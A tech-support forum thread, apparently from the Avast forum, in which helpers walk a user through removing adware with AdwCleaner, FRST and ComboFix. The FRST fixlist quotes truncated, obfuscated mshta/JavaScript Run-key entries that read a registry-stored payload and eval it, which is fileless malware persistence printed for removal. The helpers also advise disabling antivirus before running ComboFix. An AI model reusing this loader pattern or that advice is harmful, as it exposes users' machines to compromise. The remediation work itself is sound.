I have run Full Scan & Boot time scans. I uninstalled Internet Explorer from day one and even delete the contents of the Internet Explorer folder mentioned in the message bar for 2 dlls - ieproxy.dll & sqmapi.dll which I have been unable to remove even after taking ownership of them.
Would appreciate some advice on how to stop this nightmare. First time ever in many years of Avast use that I’ve
encountered such an issue.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
[*]Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
[*]Select additions at the bottom
[*]Press Scan button.
Please download AdwCleaner by Xplode onto your desktop.
[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.
Hmm the exact same infection is showing, lets try once more
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:MM6YG3zKFz="UqC9I";m8g2=new%20ActiveXObject("WScript.Shell");GGMcA9Lr="uTNbxYW";RdsV89=m8g2.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");akfWMd2lF="4xtLoV7";eval(RdsV8 (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:CY92tCCLnU="Oxlq5";k89k=new%20ActiveXObject("WScript.Shell");D1vHYMFcu="Vs";HUX4o5=k89k.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");q8CxhVuml="ox";eval(HUX4o5);WPSGc5 (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:KW3zbLY="Ecdu260TGk";c8K1=new%20ActiveXObject("WScript.Shell");VoHdg6jDS="ckvS2tBx";w1SX4s=c8K1.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");NK6ft7kv="xoUxfLX7m";eval(w1SX4s);gP22F (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
U3 ar5yet3c; C:\Windows\System32\Drivers\ar5yet3c.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [Amazon Music] => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that
THEN
Download and Install Combofix
Download ComboFix from one of the following locations: Link 1 Link 2
VERY IMPORTANT !!! Save ComboFix.exe to your Desktop
IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here
[*]Double click on ComboFix.exe & follow the prompts.
[*]Accept the disclaimer and allow to update if it asks
Followed the instructions to the letter. Did a FSRT scan and log file attached. Then ran ComboFix which scanned and then rebooted after completion, on returning to the Desktop another window opened and started to create a log file, unfortunately it came up with an error because of disk error, damaged or something like that. I was unable to take a screenshot because my was sort of frozen and had to reboot once more. I’ve only had one pop up for the last hour or so.
[*]If malicious objects are found, they will show in the Scan results and offer three (3) options.
[*]Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
Sorry for the delay. I checked the services and Windows Defender was active so I switched it off, ran Adwcleaner followed by Combofix and after the reboots no more pop ups. All going well for a number of hours.